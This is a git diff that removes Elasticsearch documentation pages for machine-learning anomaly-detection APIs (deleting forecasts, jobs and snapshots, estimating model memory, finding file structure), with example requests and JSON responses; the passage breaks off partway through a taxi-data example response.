diff --git a/docs/reference/ml/anomaly-detection/apis/delete-forecast.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-forecast.asciidoc deleted file mode 100644 index 9d39712944c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-forecast.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-forecast]] -= Delete forecasts API -++++ -Delete forecasts -++++ - -Deletes forecasts from a {ml} job. - -[[ml-delete-forecast-request]] -== {api-request-title} - -`DELETE _ml/anomaly_detectors//_forecast` + - -`DELETE _ml/anomaly_detectors//_forecast/` + - -`DELETE _ml/anomaly_detectors//_forecast/_all` - -[[ml-delete-forecast-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-forecast-desc]] -== {api-description-title} - -By default, forecasts are retained for 14 days. You can specify a different -retention period with the `expires_in` parameter in the -<>. The delete forecast API enables you to delete -one or more forecasts before they expire. - -NOTE: When you delete a job, its associated forecasts are deleted. - -For more information, see -{ml-docs}/ml-overview.html#ml-forecasting[Forecasting the future]. - -[[ml-delete-forecast-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) A comma-separated list of forecast identifiers. If you do not -specify this optional parameter or if you specify `_all` or `*` the API deletes all -forecasts from the job. - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - - -[[ml-delete-forecast-query-parms]] -== {api-query-parms-title} - -`allow_no_forecasts`:: - (Optional, Boolean) Specifies whether an error occurs when there are no - forecasts. In particular, if this parameter is set to `false` and there are no - forecasts associated with the job, attempts to delete all forecasts return an - error. The default value is `true`. - -`timeout`:: - (Optional, <>) Specifies the period of time to wait - for the completion of the delete operation. When this period of time elapses, - the API fails and returns an error. The default value is `30s`. - -[[ml-delete-forecast-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/total-requests/_forecast/_all --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -If the request does not encounter errors, you receive the following result: - -[source,js] ----- -{ - "acknowledged": true -} ----- -// NOTCONSOLE diff --git a/docs/reference/ml/anomaly-detection/apis/delete-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-job.asciidoc deleted file mode 100644 index 13e0bc7f7c3..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-job.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-job]] -= Delete {anomaly-jobs} API -++++ -Delete jobs -++++ - -Deletes an existing {anomaly-job}. - -[[ml-delete-job-request]] -== {api-request-title} - -`DELETE _ml/anomaly_detectors/` - -[[ml-delete-job-prereqs]] -== {api-prereq-title} - -* If {es} {security-features} are enabled, you must have `manage_ml` or `manage` -cluster privileges to use this API. See <> and -{ml-docs-setup-privileges}. -* Before you can delete a job, you must delete the {dfeeds} that are associated -with it. See <>. -* Before you can delete a job, you must close it (unless you specify the `force` parameter). See <>. - -[[ml-delete-job-desc]] -== {api-description-title} - -All job configuration, model state and results are deleted. - -IMPORTANT: Deleting an {anomaly-job} must be done via this API only. Do not -delete the job directly from the `.ml-*` indices using the {es} delete document -API. When {es} {security-features} are enabled, make sure no `write` privileges -are granted to anyone over the `.ml-*` indices. - -It is not currently possible to delete multiple jobs using wildcards or a comma -separated list. - -[[ml-delete-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-delete-job-query-parms]] -== {api-query-parms-title} - -`force`:: -(Optional, Boolean) Use to forcefully delete an opened job; this method is -quicker than closing and deleting the job. - -`wait_for_completion`:: -(Optional, boolean) Specifies whether the request should return immediately or -wait until the job deletion completes. Defaults to `true`. - -[[ml-delete-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/total-requests --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When the job is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- - -In the next example we delete the `total-requests` job asynchronously: - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/total-requests?wait_for_completion=false --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When `wait_for_completion` is set to `false`, the response contains the id -of the job deletion task: - -[source,console-result] ----- -{ - "task": "oTUltX4IQMOUUVeiohTt8A:39" -} ----- -// TESTRESPONSE[s/"task": "oTUltX4IQMOUUVeiohTt8A:39"/"task": $body.task/] diff --git a/docs/reference/ml/anomaly-detection/apis/delete-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-snapshot.asciidoc deleted file mode 100644 index 26cb641c6b6..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-snapshot.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-snapshot]] -= Delete model snapshots API -++++ -Delete model snapshots -++++ - -Deletes an existing model snapshot. - -[[ml-delete-snapshot-request]] -== {api-request-title} - -`DELETE _ml/anomaly_detectors//model_snapshots/` - -[[ml-delete-snapshot-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See <> and -{ml-docs-setup-privileges}. - -[[ml-delete-snapshot-desc]] -== {api-description-title} - -IMPORTANT: You cannot delete the active model snapshot. To delete that snapshot, -first revert to a different one. To identify the active model snapshot, refer to -the `model_snapshot_id` in the results from the get jobs API. - -[[ml-delete-snapshot-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -[[ml-delete-snapshot-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/anomaly_detectors/farequote/model_snapshots/1491948163 --------------------------------------------------- -// TEST[skip:todo] - -When the snapshot is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/estimate-model-memory.asciidoc b/docs/reference/ml/anomaly-detection/apis/estimate-model-memory.asciidoc deleted file mode 100644 index c4759a8d2c9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/estimate-model-memory.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-estimate-model-memory]] -= Estimate {anomaly-jobs} model memory API -++++ -Estimate model memory -++++ - -Makes an estimation of the memory usage for an {anomaly-job} model. It -is based on analysis configuration details for the job and cardinality estimates for the -fields it references. - - -[[ml-estimate-model-memory-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/_estimate_model_memory` - -[[ml-estimate-model-memory-prereqs]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* `manage_ml` or cluster: `manage` - -For more information, see <> and -{ml-docs-setup-privileges}. - - -[[ml-estimate-model-memory-request-body]] -== {api-request-body-title} - -`analysis_config`:: -(Required, object) -For a list of the properties that you can specify in the `analysis_config` -component of the body of this API, see <>. - -`max_bucket_cardinality`:: -(Required^\*^, object) -Estimates of the highest cardinality in a single bucket that is observed for -influencer fields over the time period that the job analyzes data. To produce a -good answer, values must be provided for all influencer fields. Providing values -for fields that are not listed as `influencers` has no effect on the estimation. + -^*^It can be omitted from the request if there are no `influencers`. - -`overall_cardinality`:: -(Required^\*^, object) -Estimates of the cardinality that is observed for fields over the whole time -period that the job analyzes data. To produce a good answer, values must be -provided for fields referenced in the `by_field_name`, `over_field_name` and -`partition_field_name` of any detectors. Providing values for other fields has -no effect on the estimation. + -^*^It can be omitted from the request if no detectors have a `by_field_name`, -`over_field_name` or `partition_field_name`. - -[[ml-estimate-model-memory-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_estimate_model_memory -{ - "analysis_config": { - "bucket_span": "5m", - "detectors": [ - { - "function": "sum", - "field_name": "bytes", - "by_field_name": "status", - "partition_field_name": "app" - } - ], - "influencers": [ "source_ip", "dest_ip" ] - }, - "overall_cardinality": { - "status": 10, - "app": 50 - }, - "max_bucket_cardinality": { - "source_ip": 300, - "dest_ip": 30 - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -The estimate returns the following result: - -[source,console-result] ----- -{ - "model_memory_estimate": "21mb" -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/find-file-structure.asciidoc b/docs/reference/ml/anomaly-detection/apis/find-file-structure.asciidoc deleted file mode 100644 index a1c7516c018..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/find-file-structure.asciidoc +++ /dev/null @@ -1,1954 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ml-find-file-structure]] -= Find file structure API -++++ -Find file structure -++++ - -experimental[] - -Finds the structure of a text file. The text file must contain data that is -suitable to be ingested into {es}. - - -[[ml-find-file-structure-request]] -== {api-request-title} - -`POST _ml/find_file_structure` - - -[[ml-find-file-structure-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml` or -`monitor` cluster privileges to use this API. See -<> and -{ml-docs-setup-privileges}. - - -[[ml-find-file-structure-desc]] -== {api-description-title} - -This API provides a starting point for ingesting data into {es} in a format that -is suitable for subsequent use with other {ml} functionality. - -Unlike other {es} endpoints, the data that is posted to this endpoint does not -need to be UTF-8 encoded and in JSON format. It must, however, be text; binary -file formats are not currently supported. - -The response from the API contains: - -* A couple of messages from the beginning of the file. -* Statistics that reveal the most common values for all fields detected within - the file and basic numeric statistics for numeric fields. -* Information about the structure of the file, which is useful when you write - ingest configurations to index the file contents. -* Appropriate mappings for an {es} index, which you could use to ingest the file - contents. - -All this information can be calculated by the structure finder with no guidance. -However, you can optionally override some of the decisions about the file -structure by specifying one or more query parameters. - -Details of the output can be seen in the -<>. - -If the structure finder produces unexpected results for a particular file, -specify the `explain` query parameter. It causes an `explanation` to appear in -the response, which should help in determining why the returned structure was -chosen. - - -[[ml-find-file-structure-query-parms]] -== {api-query-parms-title} - -`charset`:: - (Optional, string) The file's character set. It must be a character set that - is supported by the JVM that {es} uses. For example, `UTF-8`, `UTF-16LE`, - `windows-1252`, or `EUC-JP`. If this parameter is not specified, the structure - finder chooses an appropriate character set. - -`column_names`:: - (Optional, string) If you have set `format` to `delimited`, you can specify - the column names in a comma-separated list. If this parameter is not specified, - the structure finder uses the column names from the header row of the file. If - the file does not have a header role, columns are named "column1", "column2", - "column3", etc. - -`delimiter`:: - (Optional, string) If you have set `format` to `delimited`, you can specify - the character used to delimit the values in each row. Only a single character - is supported; the delimiter cannot have multiple characters. By default, the - API considers the following possibilities: comma, tab, semi-colon, and pipe - (`|`). In this default scenario, all rows must have the same number of fields - for the delimited format to be detected. If you specify a delimiter, up to 10% - of the rows can have a different number of columns than the first row. - -`explain`:: - (Optional, Boolean) If this parameter is set to `true`, the response includes - a field named `explanation`, which is an array of strings that indicate how - the structure finder produced its result. The default value is `false`. - -`format`:: -(Optional, string) The high level structure of the file. Valid values are -`ndjson`, `xml`, `delimited`, and `semi_structured_text`. By default, the -API chooses the format. In this default scenario, all rows must -have the same number of fields for a delimited format to be detected. If the -`format` is set to `delimited` and the `delimiter` is not set, however, the -API tolerates up to 5% of rows that have a different number of -columns than the first row. - -`grok_pattern`:: - (Optional, string) If you have set `format` to `semi_structured_text`, you can - specify a Grok pattern that is used to extract fields from every message in - the file. The name of the timestamp field in the Grok pattern must match what - is specified in the `timestamp_field` parameter. If that parameter is not - specified, the name of the timestamp field in the Grok pattern must match - "timestamp". If `grok_pattern` is not specified, the structure finder creates - a Grok pattern. - -`has_header_row`:: - (Optional, Boolean) If you have set `format` to `delimited`, you can use this - parameter to indicate whether the column names are in the first row of the - file. If this parameter is not specified, the structure finder guesses based - on the similarity of the first row of the file to other rows. - -`line_merge_size_limit`:: - (Optional, unsigned integer) The maximum number of characters in a message - when lines are merged to form messages while analyzing semi-structured files. - The default is `10000`. If you have extremely long messages you may need to - increase this, but be aware that this may lead to very long processing times - if the way to group lines into messages is misdetected. - -`lines_to_sample`:: - (Optional, unsigned integer) The number of lines to include in the structural - analysis, starting from the beginning of the file. The minimum is 2; the - default is `1000`. If the value of this parameter is greater than the number - of lines in the file, the analysis proceeds (as long as there are at least two - lines in the file) for all of the lines. + -+ --- -NOTE: The number of lines and the variation of the lines affects the speed of -the analysis. For example, if you upload a log file where the first 1000 lines -are all variations on the same message, the analysis will find more commonality -than would be seen with a bigger sample. If possible, however, it is more -efficient to upload a sample file with more variety in the first 1000 lines than -to request analysis of 100000 lines to achieve some variety. --- - -`quote`:: - (Optional, string) If you have set `format` to `delimited`, you can specify - the character used to quote the values in each row if they contain newlines or - the delimiter character. Only a single character is supported. If this - parameter is not specified, the default value is a double quote (`"`). If your - delimited file format does not use quoting, a workaround is to set this - argument to a character that does not appear anywhere in the sample. - -`should_trim_fields`:: - (Optional, Boolean) If you have set `format` to `delimited`, you can specify - whether values between delimiters should have whitespace trimmed from them. If - this parameter is not specified and the delimiter is pipe (`|`), the default - value is `true`. Otherwise, the default value is `false`. - -`timeout`:: - (Optional, <>) Sets the maximum amount of time that the - structure analysis make take. If the analysis is still running when the - timeout expires then it will be aborted. The default value is 25 seconds. - -`timestamp_field`:: - (Optional, string) The name of the field that contains the primary timestamp - of each record in the file. In particular, if the file were ingested into an - index, this is the field that would be used to populate the `@timestamp` field. -+ --- -If the `format` is `semi_structured_text`, this field must match the name of the -appropriate extraction in the `grok_pattern`. Therefore, for semi-structured -file formats, it is best not to specify this parameter unless `grok_pattern` is -also specified. - -For structured file formats, if you specify this parameter, the field must exist -within the file. - -If this parameter is not specified, the structure finder makes a decision about -which field (if any) is the primary timestamp field. For structured file -formats, it is not compulsory to have a timestamp in the file. --- - -`timestamp_format`:: - (Optional, string) The Java time format of the timestamp field in the file. -+ --- -Only a subset of Java time format letter groups are supported: - -* `a` -* `d` -* `dd` -* `EEE` -* `EEEE` -* `H` -* `HH` -* `h` -* `M` -* `MM` -* `MMM` -* `MMMM` -* `mm` -* `ss` -* `XX` -* `XXX` -* `yy` -* `yyyy` -* `zzz` - -Additionally `S` letter groups (fractional seconds) of length one to nine are -supported providing they occur after `ss` and separated from the `ss` by a `.`, -`,` or `:`. Spacing and punctuation is also permitted with the exception of `?`, -newline and carriage return, together with literal text enclosed in single -quotes. For example, `MM/dd HH.mm.ss,SSSSSS 'in' yyyy` is a valid override -format. - -One valuable use case for this parameter is when the format is semi-structured -text, there are multiple timestamp formats in the file, and you know which -format corresponds to the primary timestamp, but you do not want to specify the -full `grok_pattern`. Another is when the timestamp format is one that the -structure finder does not consider by default. - -If this parameter is not specified, the structure finder chooses the best -format from a built-in set. - -The following table provides the appropriate `timeformat` values for some example timestamps: - -|=== -| Timeformat | Presentation - -| yyyy-MM-dd HH:mm:ssZ | 2019-04-20 13:15:22+0000 -| EEE, d MMM yyyy HH:mm:ss Z | Sat, 20 Apr 2019 13:15:22 +0000 -| dd.MM.yy HH:mm:ss.SSS | 20.04.19 13:15:22.285 -|=== - -See -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[the Java date/time format documentation] -for more information about date and time format syntax. - --- - -[[ml-find-file-structure-request-body]] -== {api-request-body-title} - -The text file that you want to analyze. It must contain data that is suitable to -be ingested into {es}. It does not need to be in JSON format and it does not -need to be UTF-8 encoded. The size is limited to the {es} HTTP receive buffer -size, which defaults to 100 Mb. - -[[ml-find-file-structure-examples]] -== {api-examples-title} - -[[ml-find-file-structure-example-nld-json]] -=== Ingesting newline-delimited JSON - -Suppose you have a newline-delimited JSON file that contains information about -some books. You can send the contents to the `find_file_structure` endpoint: - -[source,console] ----- -POST _ml/find_file_structure -{"name": "Leviathan Wakes", "author": "James S.A. Corey", "release_date": "2011-06-02", "page_count": 561} -{"name": "Hyperion", "author": "Dan Simmons", "release_date": "1989-05-26", "page_count": 482} -{"name": "Dune", "author": "Frank Herbert", "release_date": "1965-06-01", "page_count": 604} -{"name": "Dune Messiah", "author": "Frank Herbert", "release_date": "1969-10-15", "page_count": 331} -{"name": "Children of Dune", "author": "Frank Herbert", "release_date": "1976-04-21", "page_count": 408} -{"name": "God Emperor of Dune", "author": "Frank Herbert", "release_date": "1981-05-28", "page_count": 454} -{"name": "Consider Phlebas", "author": "Iain M. Banks", "release_date": "1987-04-23", "page_count": 471} -{"name": "Pandora's Star", "author": "Peter F. Hamilton", "release_date": "2004-03-02", "page_count": 768} -{"name": "Revelation Space", "author": "Alastair Reynolds", "release_date": "2000-03-15", "page_count": 585} -{"name": "A Fire Upon the Deep", "author": "Vernor Vinge", "release_date": "1992-06-01", "page_count": 613} -{"name": "Ender's Game", "author": "Orson Scott Card", "release_date": "1985-06-01", "page_count": 324} -{"name": "1984", "author": "George Orwell", "release_date": "1985-06-01", "page_count": 328} -{"name": "Fahrenheit 451", "author": "Ray Bradbury", "release_date": "1953-10-15", "page_count": 227} -{"name": "Brave New World", "author": "Aldous Huxley", "release_date": "1932-06-01", "page_count": 268} -{"name": "Foundation", "author": "Isaac Asimov", "release_date": "1951-06-01", "page_count": 224} -{"name": "The Giver", "author": "Lois Lowry", "release_date": "1993-04-26", "page_count": 208} -{"name": "Slaughterhouse-Five", "author": "Kurt Vonnegut", "release_date": "1969-06-01", "page_count": 275} -{"name": "The Hitchhiker's Guide to the Galaxy", "author": "Douglas Adams", "release_date": "1979-10-12", "page_count": 180} -{"name": "Snow Crash", "author": "Neal Stephenson", "release_date": "1992-06-01", "page_count": 470} -{"name": "Neuromancer", "author": "William Gibson", "release_date": "1984-07-01", "page_count": 271} -{"name": "The Handmaid's Tale", "author": "Margaret Atwood", "release_date": "1985-06-01", "page_count": 311} -{"name": "Starship Troopers", "author": "Robert A. Heinlein", "release_date": "1959-12-01", "page_count": 335} -{"name": "The Left Hand of Darkness", "author": "Ursula K. Le Guin", "release_date": "1969-06-01", "page_count": 304} -{"name": "The Moon is a Harsh Mistress", "author": "Robert A. Heinlein", "release_date": "1966-04-01", "page_count": 288} ----- - -If the request does not encounter errors, you receive the following result: - -[source,console-result] ----- -{ - "num_lines_analyzed" : 24, <1> - "num_messages_analyzed" : 24, <2> - "sample_start" : "{\"name\": \"Leviathan Wakes\", \"author\": \"James S.A. Corey\", \"release_date\": \"2011-06-02\", \"page_count\": 561}\n{\"name\": \"Hyperion\", \"author\": \"Dan Simmons\", \"release_date\": \"1989-05-26\", \"page_count\": 482}\n", <3> - "charset" : "UTF-8", <4> - "has_byte_order_marker" : false, <5> - "format" : "ndjson", <6> - "timestamp_field" : "release_date", <7> - "joda_timestamp_formats" : [ <8> - "ISO8601" - ], - "java_timestamp_formats" : [ <9> - "ISO8601" - ], - "need_client_timezone" : true, <10> - "mappings" : { <11> - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "author" : { - "type" : "keyword" - }, - "name" : { - "type" : "keyword" - }, - "page_count" : { - "type" : "long" - }, - "release_date" : { - "type" : "date", - "format" : "iso8601" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "date" : { - "field" : "release_date", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "ISO8601" - ] - } - } - ] - }, - "field_stats" : { <12> - "author" : { - "count" : 24, - "cardinality" : 20, - "top_hits" : [ - { - "value" : "Frank Herbert", - "count" : 4 - }, - { - "value" : "Robert A. Heinlein", - "count" : 2 - }, - { - "value" : "Alastair Reynolds", - "count" : 1 - }, - { - "value" : "Aldous Huxley", - "count" : 1 - }, - { - "value" : "Dan Simmons", - "count" : 1 - }, - { - "value" : "Douglas Adams", - "count" : 1 - }, - { - "value" : "George Orwell", - "count" : 1 - }, - { - "value" : "Iain M. Banks", - "count" : 1 - }, - { - "value" : "Isaac Asimov", - "count" : 1 - }, - { - "value" : "James S.A. Corey", - "count" : 1 - } - ] - }, - "name" : { - "count" : 24, - "cardinality" : 24, - "top_hits" : [ - { - "value" : "1984", - "count" : 1 - }, - { - "value" : "A Fire Upon the Deep", - "count" : 1 - }, - { - "value" : "Brave New World", - "count" : 1 - }, - { - "value" : "Children of Dune", - "count" : 1 - }, - { - "value" : "Consider Phlebas", - "count" : 1 - }, - { - "value" : "Dune", - "count" : 1 - }, - { - "value" : "Dune Messiah", - "count" : 1 - }, - { - "value" : "Ender's Game", - "count" : 1 - }, - { - "value" : "Fahrenheit 451", - "count" : 1 - }, - { - "value" : "Foundation", - "count" : 1 - } - ] - }, - "page_count" : { - "count" : 24, - "cardinality" : 24, - "min_value" : 180, - "max_value" : 768, - "mean_value" : 387.0833333333333, - "median_value" : 329.5, - "top_hits" : [ - { - "value" : 180, - "count" : 1 - }, - { - "value" : 208, - "count" : 1 - }, - { - "value" : 224, - "count" : 1 - }, - { - "value" : 227, - "count" : 1 - }, - { - "value" : 268, - "count" : 1 - }, - { - "value" : 271, - "count" : 1 - }, - { - "value" : 275, - "count" : 1 - }, - { - "value" : 288, - "count" : 1 - }, - { - "value" : 304, - "count" : 1 - }, - { - "value" : 311, - "count" : 1 - } - ] - }, - "release_date" : { - "count" : 24, - "cardinality" : 20, - "earliest" : "1932-06-01", - "latest" : "2011-06-02", - "top_hits" : [ - { - "value" : "1985-06-01", - "count" : 3 - }, - { - "value" : "1969-06-01", - "count" : 2 - }, - { - "value" : "1992-06-01", - "count" : 2 - }, - { - "value" : "1932-06-01", - "count" : 1 - }, - { - "value" : "1951-06-01", - "count" : 1 - }, - { - "value" : "1953-10-15", - "count" : 1 - }, - { - "value" : "1959-12-01", - "count" : 1 - }, - { - "value" : "1965-06-01", - "count" : 1 - }, - { - "value" : "1966-04-01", - "count" : 1 - }, - { - "value" : "1969-10-15", - "count" : 1 - } - ] - } - } -} ----- -// TESTRESPONSE[s/"sample_start" : ".*",/"sample_start" : "$body.sample_start",/] -// The substitution is because the "file" is pre-processed by the test harness, -// so the fields may get reordered in the JSON the endpoint sees - -<1> `num_lines_analyzed` indicates how many lines of the file were analyzed. -<2> `num_messages_analyzed` indicates how many distinct messages the lines contained. - For NDJSON, this value is the same as `num_lines_analyzed`. For other file - formats, messages can span several lines. -<3> `sample_start` reproduces the first two messages in the file verbatim. This - may help to diagnose parse errors or accidental uploads of the wrong file. -<4> `charset` indicates the character encoding used to parse the file. -<5> For UTF character encodings, `has_byte_order_marker` indicates whether the - file begins with a byte order marker. -<6> `format` is one of `ndjson`, `xml`, `delimited` or `semi_structured_text`. -<7> The `timestamp_field` names the field considered most likely to be the - primary timestamp of each document. -<8> `joda_timestamp_formats` are used to tell Logstash how to parse timestamps. -<9> `java_timestamp_formats` are the Java time formats recognized in the time - fields. Elasticsearch mappings and Ingest pipeline use this format. -<10> If a timestamp format is detected that does not include a timezone, - `need_client_timezone` will be `true`. The server that parses the file must - therefore be told the correct timezone by the client. -<11> `mappings` contains some suitable mappings for an index into which the data - could be ingested. In this case, the `release_date` field has been given a - `keyword` type as it is not considered specific enough to convert to the - `date` type. -<12> `field_stats` contains the most common values of each field, plus basic - numeric statistics for the numeric `page_count` field. This information - may provide clues that the data needs to be cleaned or transformed prior - to use by other {ml} functionality. - - -[[ml-find-file-structure-example-nyc]] -=== Finding the structure of NYC yellow cab example data - -The next example shows how it's possible to find the structure of some New York -City yellow cab trip data. The first `curl` command downloads the data, the -first 20000 lines of which are then piped into the `find_file_structure` -endpoint. The `lines_to_sample` query parameter of the endpoint is set to 20000 -to match what is specified in the `head` command. - -[source,js] ----- -curl -s "s3.amazonaws.com/nyc-tlc/trip+data/yellow_tripdata_2018-06.csv" | head -20000 | curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty&lines_to_sample=20000" -T - ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - --- -NOTE: The `Content-Type: application/json` header must be set even though in -this case the data is not JSON. (Alternatively the `Content-Type` can be set -to any other supported by {es}, but it must be set.) --- - -If the request does not encounter errors, you receive the following result: - -[source,js] ----- -{ - "num_lines_analyzed" : 20000, - "num_messages_analyzed" : 19998, <1> - "sample_start" : "VendorID,tpep_pickup_datetime,tpep_dropoff_datetime,passenger_count,trip_distance,RatecodeID,store_and_fwd_flag,PULocationID,DOLocationID,payment_type,fare_amount,extra,mta_tax,tip_amount,tolls_amount,improvement_surcharge,total_amount\n\n1,2018-06-01 00:15:40,2018-06-01 00:16:46,1,.00,1,N,145,145,2,3,0.5,0.5,0,0,0.3,4.3\n", - "charset" : "UTF-8", - "has_byte_order_marker" : false, - "format" : "delimited", <2> - "multiline_start_pattern" : "^.*?,\"?\\d{4}-\\d{2}-\\d{2}[T ]\\d{2}:\\d{2}", - "exclude_lines_pattern" : "^\"?VendorID\"?,\"?tpep_pickup_datetime\"?,\"?tpep_dropoff_datetime\"?,\"?passenger_count\"?,\"?trip_distance\"?,\"?RatecodeID\"?,\"?store_and_fwd_flag\"?,\"?PULocationID\"?,\"?DOLocationID\"?,\"?payment_type\"?,\"?fare_amount\"?,\"?extra\"?,\"?mta_tax\"?,\"?tip_amount\"?,\"?tolls_amount\"?,\"?improvement_surcharge\"?,\"?total_amount\"?", - "column_names" : [ <3> - "VendorID", - "tpep_pickup_datetime", - "tpep_dropoff_datetime", - "passenger_count", - "trip_distance", - "RatecodeID", - "store_and_fwd_flag", - "PULocationID", - "DOLocationID", - "payment_type", - "fare_amount", - "extra", - "mta_tax", - "tip_amount", - "tolls_amount", - "improvement_surcharge", - "total_amount" - ], - "has_header_row" : true, <4> - "delimiter" : ",", <5> - "quote" : "\"", <6> - "timestamp_field" : "tpep_pickup_datetime", <7> - "joda_timestamp_formats" : [ <8> - "YYYY-MM-dd HH:mm:ss" - ], - "java_timestamp_formats" : [ <9> - "yyyy-MM-dd HH:mm:ss" - ], - "need_client_timezone" : true, <10> - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "DOLocationID" : { - "type" : "long" - }, - "PULocationID" : { - "type" : "long" - }, - "RatecodeID" : { - "type" : "long" - }, - "VendorID" : { - "type" : "long" - }, - "extra" : { - "type" : "double" - }, - "fare_amount" : { - "type" : "double" - }, - "improvement_surcharge" : { - "type" : "double" - }, - "mta_tax" : { - "type" : "double" - }, - "passenger_count" : { - "type" : "long" - }, - "payment_type" : { - "type" : "long" - }, - "store_and_fwd_flag" : { - "type" : "keyword" - }, - "tip_amount" : { - "type" : "double" - }, - "tolls_amount" : { - "type" : "double" - }, - "total_amount" : { - "type" : "double" - }, - "tpep_dropoff_datetime" : { - "type" : "date", - "format" : "yyyy-MM-dd HH:mm:ss" - }, - "tpep_pickup_datetime" : { - "type" : "date", - "format" : "yyyy-MM-dd HH:mm:ss" - }, - "trip_distance" : { - "type" : "double" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "csv" : { - "field" : "message", - "target_fields" : [ - "VendorID", - "tpep_pickup_datetime", - "tpep_dropoff_datetime", - "passenger_count", - "trip_distance", - "RatecodeID", - "store_and_fwd_flag", - "PULocationID", - "DOLocationID", - "payment_type", - "fare_amount", - "extra", - "mta_tax", - "tip_amount", - "tolls_amount", - "improvement_surcharge", - "total_amount" - ] - } - }, - { - "date" : { - "field" : "tpep_pickup_datetime", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "yyyy-MM-dd HH:mm:ss" - ] - } - }, - { - "convert" : { - "field" : "DOLocationID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "PULocationID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "RatecodeID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "VendorID", - "type" : "long" - } - }, - { - "convert" : { - "field" : "extra", - "type" : "double" - } - }, - { - "convert" : { - "field" : "fare_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "improvement_surcharge", - "type" : "double" - } - }, - { - "convert" : { - "field" : "mta_tax", - "type" : "double" - } - }, - { - "convert" : { - "field" : "passenger_count", - "type" : "long" - } - }, - { - "convert" : { - "field" : "payment_type", - "type" : "long" - } - }, - { - "convert" : { - "field" : "tip_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "tolls_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "total_amount", - "type" : "double" - } - }, - { - "convert" : { - "field" : "trip_distance", - "type" : "double" - } - }, - { - "remove" : { - "field" : "message" - } - } - ] - }, - "field_stats" : { - "DOLocationID" : { - "count" : 19998, - "cardinality" : 240, - "min_value" : 1, - "max_value" : 265, - "mean_value" : 150.26532653265312, - "median_value" : 148, - "top_hits" : [ - { - "value" : 79, - "count" : 760 - }, - { - "value" : 48, - "count" : 683 - }, - { - "value" : 68, - "count" : 529 - }, - { - "value" : 170, - "count" : 506 - }, - { - "value" : 107, - "count" : 468 - }, - { - "value" : 249, - "count" : 457 - }, - { - "value" : 230, - "count" : 441 - }, - { - "value" : 186, - "count" : 432 - }, - { - "value" : 141, - "count" : 409 - }, - { - "value" : 263, - "count" : 386 - } - ] - }, - "PULocationID" : { - "count" : 19998, - "cardinality" : 154, - "min_value" : 1, - "max_value" : 265, - "mean_value" : 153.4042404240424, - "median_value" : 148, - "top_hits" : [ - { - "value" : 79, - "count" : 1067 - }, - { - "value" : 230, - "count" : 949 - }, - { - "value" : 148, - "count" : 940 - }, - { - "value" : 132, - "count" : 897 - }, - { - "value" : 48, - "count" : 853 - }, - { - "value" : 161, - "count" : 820 - }, - { - "value" : 234, - "count" : 750 - }, - { - "value" : 249, - "count" : 722 - }, - { - "value" : 164, - "count" : 663 - }, - { - "value" : 114, - "count" : 646 - } - ] - }, - "RatecodeID" : { - 